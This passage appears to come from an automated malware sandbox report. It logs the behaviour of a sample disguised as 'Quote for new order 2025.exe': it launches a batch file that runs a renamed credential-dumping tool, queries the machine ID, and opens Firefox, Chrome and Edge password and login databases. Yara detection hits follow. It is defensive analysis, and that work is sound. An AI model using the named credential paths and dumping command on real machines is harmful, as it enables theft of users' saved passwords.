Source: C:\Users\user\Desktop\Chrom.exe Code function: 4_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle 4_2_0040BAE3
Source: C:\Users\user\Desktop\Chrom.exe Code function: 4_2_004053E1 LoadLibraryW,GetProcAddress,FreeLibrary,#17,MessageBoxW 4_2_004053E1
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txt
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txt
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txt
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Users\user\Desktop\Quote for new order 2025.exe VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Users\user\Desktop\Quote for new order 2025.exe VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0041A773 GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_004192F2 GetVersionExW
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Users\user\Desktop\Chrom.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\Chrom.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Chrom.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Chrom.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Chrom.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\Chrom.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: Yara match | File source: Quote for new order 2025.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Quote for new order 2025.exe.eaa5ec.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.Chrom.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.Chrom.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.Quote for new order 2025.exe.eaa5ec.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Chrom.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.Chrom.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.Chrom.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Chrom.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.Quote for new order 2025.exe.e90000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
